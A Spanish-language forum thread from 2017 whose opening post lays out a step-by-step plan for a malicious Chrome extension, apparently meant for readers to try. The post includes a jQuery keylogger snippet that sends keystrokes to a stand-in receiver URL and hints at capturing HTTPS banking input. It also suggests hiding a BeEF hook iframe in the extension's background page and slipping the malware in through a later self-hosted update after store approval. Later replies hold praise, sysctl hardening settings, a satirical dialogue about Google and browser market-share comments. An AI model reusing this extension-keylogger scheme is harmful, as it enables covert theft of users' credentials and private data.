El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 24-11-2017 13:47:47

Koala
Very Important Usuario

Registrado: 11-09-2016
Mensajes: 779

Google el primero navigador y el mas inseguro...

Sheep

Don't be a sheep, don't use google


Buenas, hoy vamos a hablar de como Google trata tu datos... o sea como una mie****

Preciso antes de todo que no voy a divulgar aquí un código completo o los ficheros necesarios a la creación de un pequeño malware. No obstante voy a dar bastante información para que entendáis el proceso y seáis capaces de hacer algo "fun" de vuestro lado 

Erase una vez un país lejano, el maravilloso mundo de los malwares. O cómo entrometerse en una maquina siendo discreto y todo de forma bastante desatendida una vez que el sistema victima ha sido comprometido. 
Para ser sincero no soy ningún especialista en esto ni mucho menos.

¡Vamos al grano!

En lugar de interesarme directamente a los ficheros VB, C++ etc...; he preferido enfocarme en un campo que me parece micho más sencillo para meterse en el asunto: El navegador.

¿Qué tenemos en un navegador web?

Un montón de cosas y entre ellas un "modo desarrollador" y mucho java

Java - malware: Esto se entiende. Ahora...

¿Para qué interesarse al modo desarrollador si no somos desarrollador de web? 

Simplemente para "debuging". Tomemos en ejemplo el navegador Chrome.

chrome debug


Podemos ver ahora lo que ocurre en segundo plano en nuestro navegador, muy útil para lo que sigue. Podéis ver que uso adblock, una extensión muy conocida.

¿Y qué es una extensión (plug-in)?

Bueno, son trozos de código que van a actuar directamente con nuestro navegador para modificar, guardar y hacer todo tipos de cosas con los datos que tratan el navegador 

chromestore

  ¿Veis por dónde van los tiros?


Si una extensión es capaz de modificar cosas y de comunicar con el navegador... ¿Por qué no la haríamos comunicar... con nosotros mismos?
¿Es esto posible?
¿Google y lo antivirus lo permiten?

Google aplica reglas estrictas sobre las extensiones. En cuanto a los antivirus,  no analizan una extensión proveniente del "Chromestore". Tenemos entonces a varios objetivos:

1- Crear una extensión y que sea útil (o lo parezca) para que la gente la pruebe. Es "ingeniera social": Usad vuestra imaginación. 
2- Crear un fichero manifest.json (es el más importante)
3- Hacer un código java para sutilizar el histórico de navegación y de datos entrados por el usuario cuando cierra su navegador
4- Recuperar los datos es una cosa, hacer salir los datos es otra...
5- ..Debemos poder acceder remotamente a estos datos.
6- Se debe colocar esta extensión en el chromestore y conseguir que sea validada ("cumplir" las reglas del chromestore).
Pasamos directo al punto 2, el "fichero json". Es el punto clave y es un fichero sencillo que tiene esta pinta: 

{
  "name": "Mi grande extension",
  "description": "Pithy description (132 characters or less, no HTML)",
  "version": "0.0.0.1",
  "manifest_version": 2,
  "icons": {
    "128": "icon_128.png"
  },
  "app": {
    "urls": [
      "http://mysubdomain.example.com/"
    ],
    "launch": {
      "web_url": "http://mysubdomain.example.com/"
    }
  }
}

Este fichero presenta las funciones de la extensión por grupos bloques. El ejemplo puesto está sacado de la documentación de google. Una extensión lleva siempre este fichero, luego tiene a unos scripts escrito en javascript que cumplen las tareas y eventualmente a unas cuantas imágenes, un logo, para decorar nuestra extensión.

Veamos ahora  una parte del fichero manifest.json con algunos scripts y una página html integrada:

"content_scripts": [{
    "matches": ["http://*/*", "https://*/*"],
    "css": [],
    "js": [
        "jquery.js",
        "blabla.js"
    ]
  }],
"background": {
    "page": "background.html"
  },

matches: significa que la extensión esta autorizada a comunicar mediante http y https. He dejado el css en blanco, podéis ver que se puede personalizar mucho la cosa.
js: Los javascripts que se ejecutarán con nuestra extensión.
background: La página html para presentar la extensión.

Estas son nuestras tres principales piezas para nuestra extensión.

Ahore, tenemos que hacer un poco de código  javascript para borrar el historial de datos cuando el usuario cierra su navegador y luego recuperar esta información.

Es relativamente simple: Podemos copiar el código de otra extensión ya que es algo que hacen automáticamente al cerrar Chrome. Les tocará modificar un poco el código para que se ejecute una sola vez, al cierre de chrome. Les dejo aquí una pequeña lista de extensiones para ayudarles a codificar esta parte, 

extension

Sobre la recuperación de los datos es de nuevo algo muy simple. Se hace con lineas. Javascript es potente y se conocen de sobre sus "virtudes" para estar usado como keylogger.Pequenito ejemplo aqui:

var $js = jQuery.noConflict();
var $characters = "";
// receiver 
var $receiver = "https://myfakewebsiteinhttps.com/testkeylog/receiver.php";
$js(window).keypress(function(words){
    $characters += String.fromCharCode(words.charCode);
});
# Otros trocitos de codigos aqui, puede ser iframe etc...

Recuperar los datos es una cosa, hacerlos salir es otra.

¿No pensarías que google te iba a dejar sacar así de fácil toda la información que quieres? 

La vida no es una carnaval y google a puesto de pie el SOP (Same Origin Policy) y el CSP (Content security Policy)

El primero se encarga de verificar que los datos locales (contraseñas y otros) no salgan "al exterior" y el segundo es para prevenir brechas XSS,
O sea, teóricamente, la extensión no puede acceder a los datos personales "locales" del ordenador (cómo las contraseñas almacenadas) y no puede "mandar fuera del navegador" ningún datos personales.
Vais a preguntarme: ¿De que nos sirve todo esto si mi "extensión especial" no puede acceder a los datos del ordenador infectado ni a a las contraseñas?  Acordaros del javascript y del keylogger


Abrimos ahora nuestro chrome en modo desarrollador y intentemos incluir un vinculo externo en nuestro código hacía un script externo. Actualizamos la página y... No funciona.  Tenemos a una bonita advertencia en rojo que dice "Operación no permitida". Repetimos la operación poniendo un iframe en el código del script y, sorpresa, vemos que l'iframe está  empleado. No podemos hacer nada con esta iframe pero nos enseña una cosa: La extensión puede comunicarse con el exterior.

Aunque en este caso sea solo para enseñar una página, hemos conseguido comunicarnos con le exterior...       
Seguimos. Visto que no podemos almacenar datos en le ordenador de nuestra victima, no podemos mandar un fichero de texto, no podemos ejecutar un script... Vamos a tener que mandar los datos al vuelo hasta un servidor remoto.
Por eso tenemos que modificar el código javascript. Nuestro script manda los datos al servidor remoto que ejecuta un pequeño script php para tratar las peticiones. Todo esto es posible chapuceando con el fichero manifest.json: Google Chrome se lo traga. 

¡Alerta!

Los datos en los sitios https no llegan al servidor. De momento... Es porque el https solo se comunica con https.
Lo único que debemos hacer es instalar el https en nuestro servidor... y me parece que he hecho otro hilo sobre eso aqui wink

Tiene que ser un https reconocido por chrome y los otros navegadores. Si tenéis un certificado SSL valido (existen soluciones gratis) recibiréis los datos que entra el usuario mientras, por ejemplo, hace una transacción bancaria en su sitio debidamente protegido con https.   


Tratar los datos remotamente.

Podríamos pensar que ya hemos conseguido lo que queríamos y que basta. Pero podemos ir más lejos aún. ¿Os acordéis del iframe que está autorizado a comunicarse con el exterior? Era para acceder a una simple página. ¿Qué pasaría si la incluimos en el código? Ya sabemos que La comunicación hacía el exterior está restringida por google... Poner un iframe no debería servir de nada. Pero... Una extensión puede incluir un fichero "background.html". Es la página de presentación de la extensión y en esta página sí que los iframes están autorizados.  Podemos esconder aquí el iframe con, por ejemplo,  Beef.


Subir está extensión en el mercado de google de tal forma que esté aceptada.


No he testeado está ultima parte porque no me interesa hacerme un botnet. Pero se me ocurren algunas ideas si tal sería el caso. No llegaríamos muy lejos si intentaríamos  colocar directamente una extensión que contiene código malicioso en el google store. Sería comprobada y rechazada.  Lo que haría sería primero colocar una extensión limpia que google acepta. Y luego introduciría el malware con una actualización. Sí amigos mios: Google permite le actualización desde un servidor externo. Es decir que una vez que la extensión está validada no es necesario pasar por google para efectuar las "actualizaciones". No hay ningún control sobre el contenido de las actualizaciones. Además los antivirus no controlan las extensiones chrome provenientes del Chrome Store ya que se consideran seguras. 

Esto es todo... Ya he dado bastantes elementos para crear y ofuscar un malware casero para el navegador más empleado en el mundo: Google Chrome,
Así que no voy a decir nada más...

Para la pequena historia he intentado de hablar con el serviccio de seguridad.. ni ostia.. te mandan en primero un bot para hablar, en segundo te dicen que tu descubierta va a estar analyzado.. admiten sin hacer te ofertas que tienen une falta...

Servicio de seguridad de google escribió:

Chrome extensions need to be able to bypass the SOP in order to inspect and change the HTML content on a page.  For example, AdBlock needs to be able to read a document to identify which elements are ads, and it needs to change that document by deleting ads.  Chrome requires extensions to specify which domains they intend to read and edit, but it's true that we ultimately need to trust that extension authors are not stealing data from a webpage.


"but it's true that we ultimately need to trust that extension authors are not stealing data from a webpage."

Me rio de ver eso, el primero navigador del mundo no filtra nada de una extension ... big_smile Buen trabajo chicos de la Silicon Valley lol

He elegido de publicar este hilo por 2 cosas:

- La primera es para demonstrar que google le da igual de dar te dinero, te toman tu descubierta y basta.Ademas hablando un poco con ello, estan en un otro mundo, parece que son gente formatada y aburrida.
- La segunda es que hay muchos otro navigadores que puedes usar a parte de google.. Mozilla, Opéra, Quantum, Duck and Go...

Google quiere estar en todos los lados con los android tambien que te hacen actualizaciones casi cada dia y que tienen tambien su loteria de brecha... No tenemos que estar pendiante de este goggle de la ostia !!!

Soy usando Opéra de mi lado y anda muy bien.Google me sirve de punchinball cuando quiero probar cosas.La verdad es que esta brecha lo he encontrado intentado de bypass el HSTS, no fue encontra de google al empezado pero cuando veo como andan... ya vale...



Bueno, y una última cosa más:
           

Don't trust this bullshit of google!


Gracias @ Kcdtv para el ayuda de la traduccion de este hilo cool


Hostbase rogue AP project con Kali-linux xfce.

Debian--Arch--Kali--DFlinux

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#2 24-11-2017 15:23:26

crash
Expulsado

Registrado: 25-10-2017
Mensajes: 1,049

Re: Google el primero navigador y el mas inseguro...

yo uso varias extensiones para evitar cosas raras,
ghostery
chrome ua spoofer
flash control
history eliminator
https everywhere
html5 para videos

y la principal el sentido comun, junto con la anonimizacion de linux para navegar por sitios indecentes

Desconectado

#3 24-11-2017 18:10:23

Koala
Very Important Usuario

Registrado: 11-09-2016
Mensajes: 779

Re: Google el primero navigador y el mas inseguro...

El problemo es por la mayoridad de los usarios que no conocen esas extensiones y que se van siempre por google.


Hostbase rogue AP project con Kali-linux xfce.

Debian--Arch--Kali--DFlinux

Desconectado

#4 24-11-2017 19:29:59

crash
Expulsado

Registrado: 25-10-2017
Mensajes: 1,049

Re: Google el primero navigador y el mas inseguro...

Koala escribió:

El problemo es por la mayoridad de los usarios que no conocen esas extensiones y que se van siempre por google.

lo se. pero de todas maneras sabemos que no hay nada seguro al 100%, en ningún tipo de tecnología. también uso el adblock y ademas en el sistema operativo tengo activado para evitar ataques mitm en el archivo /etc/sysctl.conf

# Uncomment the next two lines to enable Spoof protection (reverse-path filter)
# Turn on Source Address Verification in all interfaces to
# prevent some spoofing attacks
net.ipv4.conf.default.rp_filter=1
net.ipv4.conf.all.rp_filter=1

# Additional settings - these settings can improve the network
# security of the host and prevent against some network attacks
# including spoofing attacks and man in the middle attacks through
# redirection. Some network environments, however, require that these
# settings are disabled so review and enable them as needed.
#
# Do not accept ICMP redirects (prevent MITM attacks)
net.ipv4.conf.all.accept_redirects = 0
net.ipv6.conf.all.accept_redirects = 0

al menos siempre es mas seguro asi que sin nada

Desconectado

#5 24-11-2017 22:09:55

Patcher
waircut

Registrado: 14-01-2016
Mensajes: 555

Re: Google el primero navigador y el mas inseguro...

Gran trabajo Koala!!. Es desde luego algo muy inovador y peligroso. Gracias por compartirlo en esta comunidad.

Desconectado

#6 25-11-2017 00:07:02

dymusya
Very Important Usuario

Registrado: 19-04-2015
Mensajes: 174

Re: Google el primero navigador y el mas inseguro...

Increible, hasta donde has llegado. Gracias por compartir  y por tu pedazo del trabajo que hiciste!

Desconectado

#7 01-12-2017 00:01:25

crash
Expulsado

Registrado: 25-10-2017
Mensajes: 1,049

Re: Google el primero navigador y el mas inseguro...

ASÍ ACABAREMOS...

- Hola, buenas tardes. ¿Pizzería Renato?
- No, señor. Esto es Pizzería Google.
- Disculpe, me habré equivocado de número…
- No, señor. Google la ha comprado y le ha puesto su nombre.
- Ah, perfecto. Pues me gustaría hacer un pedido.
- Muy bien, señor López. ¿Desea su pedido habitual?
- ¿El habitual? ¿Sr. López? ¿Me conoce?
- Según nuestro identificador de llamada, las últimas 12 veces, usted nos ha pedido la pizza 4 Quesos individual.
- Exacto, esa es la que quiero.
- ¿Puedo sugerirle esta vez que pruebe nuestra pizza Vegetal con ricotta, rúcula, berenjena, calabacín y tomate seco?
- No, gracias. Odio las verduras.
- Ya, pero le convendría más. Su nivel de colesterol no está muy bien.
- ¿Perdone? ¿Cómo sabe usted eso?
- A través de nuestra suscripción profesional a la Guía Médica Online. Disponemos de los resultados de sus análisis de sangre de los últimos 5 años.
- Pero no me gusta esa pizza, odio la verdura. Además, ya estoy en tratamiento y estoy tomando la medicación adecuada.
- Sr. López, sabe que no toma la medicación con regularidad, hace ya 5 meses que compró una caja de 30 pastillas en Farmacia Otero García. Y no ha vuelto a comprar más…
- Eso no es cierto, he comprado más en otra farmacia.
- Pues no aparece en el extracto de su tarjeta de crédito…
- Porque pagué en efectivo.
- Pues según su saldo, no dispone de apenas efectivo en cuenta…
- Tengo efectivo en casa.
- ¿En serio? Pues no lo ha declarado en su última Renta… ¿Está reconociendo que declara menos de lo que gana? Eso es un delito, Sr. López.
- Pero, ¡¿QUÉ COJONES…?! ¡Basta ya! Estoy  harto de Google, Facebook, Twitter, WhatsApp, Instagram y su puta madre… Voy a irme a una isla desierta sin Internet, donde no haya móviles, ni teléfonos… ¡Y nadie pueda espiarme!
- Lo entiendo, caballero. Pero recuerde que debe renovar su pasaporte, lo tiene caducado desde hace 3 meses...

Desconectado

#8 01-12-2017 10:23:18

Koala
Very Important Usuario

Registrado: 11-09-2016
Mensajes: 779

Re: Google el primero navigador y el mas inseguro...

Es eso, anadido a un a mala fe de la ostia big_smile


Hostbase rogue AP project con Kali-linux xfce.

Debian--Arch--Kali--DFlinux

Desconectado

#9 01-12-2017 12:38:13

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,530

Re: Google el primero navigador y el mas inseguro...

@ crash: lol
@ Koala: No me había dado cuenta de que has soltado a "la bomba"  smile

  Es impresionante ver como google ha reventado a los otros navegadores en cuatro años....
    - Febrero 2009: 3% de los PC en el mundo usan chrome. 
    - Febrero 2013: 50% de los PC en el mundo usan chrome. 
  Ahora están a 76% de cuota de mercado...
  Firefox resiste un poco mejor que IE/Edge (4% de cuota de mercado en 2017 para los navigadores de microsoft) pero es muy duro para todo el mundo.
  Espero que la lectura de este articulo incite los lectores a dejar de usar de chrome y volver a firefox que ha rozado los 50% de audiencia en su apogeo.
Hacía casi juego igual con Internet Explorer...
  Hay que repetir y recordar que la Fundación Mozilla es un actor esencial del mundo del software libre. Sostiene la red ToR (El tor browser se basa enteramente en firefox)  y muchos otros proyectos de gran importancia para el respecto de nuestra privacidad y para un Internet libre.
  Probad firefox quantum (v. 57), usad su modo de navegación privada con una extensión como No script (más potente y más "radical" que adblock) .
    Y sobre todo... Don't trust google! tongue

Desconectado

#10 01-12-2017 13:38:32

crash
Expulsado

Registrado: 25-10-2017
Mensajes: 1,049

Re: Google el primero navigador y el mas inseguro...

kcdtv escribió:

@ crash: lol
@ Koala: No me había dado cuenta de que has soltado a "la bomba"  smile

jajajajaja la cruda realidad y a lo que vamos a llegar en un futuro proximo, kcdtv. biere big_smile big_smile tongue

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Pie de página

Información del usuario

Ultimo usuario registrado: KiViEr
Usuarios registrados conectados: 0
Invitados conectados: 14

Estadisticas de los foros

Número total de usuarios registrados: 1,276
Número total de temas: 1,224
Número total de mensajes: 12,539

Máx. usuarios conectados: 74 el 13-11-2018 18:47:20